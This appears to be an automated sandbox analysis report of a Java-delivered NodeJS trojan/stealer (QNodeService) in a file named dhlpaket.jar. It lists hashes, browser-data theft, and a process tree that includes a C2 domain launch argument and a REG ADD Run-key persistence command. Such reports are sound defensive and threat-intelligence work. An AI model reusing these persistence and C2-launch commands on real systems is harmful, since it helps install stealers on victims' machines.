Analysis

max time kernel: 92s
max time network: 111s
platform: windows10_x64
resource: win10v200722
submitted: 15-10-2020 12:48
Tasks

Static task: static1

Behavioral task: behavioral1
  Sample: dhlpaket.jar
  Resource: win7

Behavioral task: behavioral2
  Sample: dhlpaket.jar
  Resource: win10v200722
General

Target: dhlpaket.jar
Size: 289KB
MD5: b15cdc291a5e4a8535c3eb7c14eae8dc
SHA1: 1a4070204cabeb1fe552ce0d83017dd416fc1ef5
SHA256: fc893170ac17a117486c0cb8e3f0733840f5e964d4134abf74c3d801df40f75a
SHA512: 274429ccfc2d977a9d013ac788880bdb80fd3320f623042a671a2186ecc62ffb19ddcb8e452d7f1dff5a1bc66ffc4111129869ec01783bf4701a3bc5dbee000b
Malware Config
Signatures

QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.

Executes dropped EXE (3 IoCs)
  PID   Process
  3460  node.exe
  3116  node.exe
  916   node.exe

Loads dropped DLL (6 IoCs)
  PID   Process
  916   node.exe
  916   node.exe
  916   node.exe
  916   node.exe
  916   node.exe
  916   node.exe

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Adds Run key to start application (2 TTPs, 2 IoCs)
  Key created: \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (reg.exe)
  Set value (str): \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\Run\d8d826fc-4dd3-45bd-afcd-ef19584ec2cc = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" (reg.exe)

JavaScript code in executable (3 IoCs)
  Resource                                      YARA rule
  behavioral2/files/0x000100000001ad43-168.dat  js
  behavioral2/files/0x000100000001ad43-172.dat  js
  behavioral2/files/0x000100000001ad43-176.dat  js

Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
  Flow  IoC
  23    wtfismyip.com
  24    wtfismyip.com

Checks processor information in registry (2 TTPs, 6 IoCs)
Processor information is often read in order to detect sandboxing environments.
  Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (node.exe)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (node.exe)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (node.exe)
  Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 (node.exe)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz (node.exe)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString (node.exe)

Suspicious behavior: EnumeratesProcesses (18 IoCs)
  PID   Process
  3460  node.exe
  3460  node.exe
  3460  node.exe
  3460  node.exe
  3116  node.exe
  3116  node.exe
  3116  node.exe
  3116  node.exe
  916   node.exe
  916   node.exe
  916   node.exe
  916   node.exe
  916   node.exe
  916   node.exe
  916   node.exe
  916   node.exe
  916   node.exe
  916   node.exe

Suspicious use of WriteProcessMemory (16 IoCs)
  Description                       PID   Process    procid_target
  PID 3740 wrote to memory of 3660  3740  java.exe   73
  PID 3740 wrote to memory of 3660  3740  java.exe   73
  PID 3660 wrote to memory of 3460  3660  javaw.exe  77
  PID 3660 wrote to memory of 3460  3660  javaw.exe  77
  PID 3460 wrote to memory of 3116  3460  node.exe   79
  PID 3460 wrote to memory of 3116  3460  node.exe   79
  PID 3116 wrote to memory of 916   3116  node.exe   80
  PID 3116 wrote to memory of 916   3116  node.exe   80
  PID 916 wrote to memory of 2224   916   node.exe   82
  PID 916 wrote to memory of 2224   916   node.exe   82
  PID 2224 wrote to memory of 3452  2224  cmd.exe    83
  PID 2224 wrote to memory of 3452  2224  cmd.exe    83
  PID 916 wrote to memory of 2360   916   node.exe   84
  PID 916 wrote to memory of 2360   916   node.exe   84
  PID 2360 wrote to memory of 2400  2360  cmd.exe    85
  PID 2360 wrote to memory of 2400  2360  cmd.exe    85
Processes

1. C:\ProgramData\Oracle\Java\javapath\java.exe
   Command line: java -jar C:\Users\Admin\AppData\Local\Temp\dhlpaket.jar
   PID: 3740
   - Suspicious use of WriteProcessMemory

   2. C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
      Command line: "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\58b69092.tmp
      PID: 3660
      - Suspicious use of WriteProcessMemory

      3. C:\Users\Admin\node-v14.12.0-win-x64\node.exe
         Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain september101991.ddns.net
         PID: 3460
         - Executes dropped EXE
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of WriteProcessMemory

         4. C:\Users\Admin\node-v14.12.0-win-x64\node.exe
            Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_Dr5O8A\boot.js --hub-domain september101991.ddns.net
            PID: 3116
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of WriteProcessMemory

            5. C:\Users\Admin\node-v14.12.0-win-x64\node.exe
               Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_Dr5O8A\boot.js --hub-domain september101991.ddns.net
               PID: 916
               - Executes dropped EXE
               - Loads dropped DLL
               - Checks processor information in registry
               - Suspicious behavior: EnumeratesProcesses
               - Suspicious use of WriteProcessMemory

               6. C:\Windows\system32\cmd.exe
                  Command line: C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "d8d826fc-4dd3-45bd-afcd-ef19584ec2cc" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
                  PID: 2224
                  - Suspicious use of WriteProcessMemory

                  7. C:\Windows\system32\reg.exe
                     Command line: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "d8d826fc-4dd3-45bd-afcd-ef19584ec2cc" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
                     PID: 3452
                     - Adds Run key to start application

               6. C:\Windows\system32\cmd.exe
                  Command line: C:\Windows\system32\cmd.exe /d /s /c "REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "d8d826fc-4dd3-45bd-afcd-ef19584ec2cc" /F"
                  PID: 2360
                  - Suspicious use of WriteProcessMemory

                  7. C:\Windows\system32\reg.exe
                     Command line: REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "d8d826fc-4dd3-45bd-afcd-ef19584ec2cc" /F
                     PID: 2400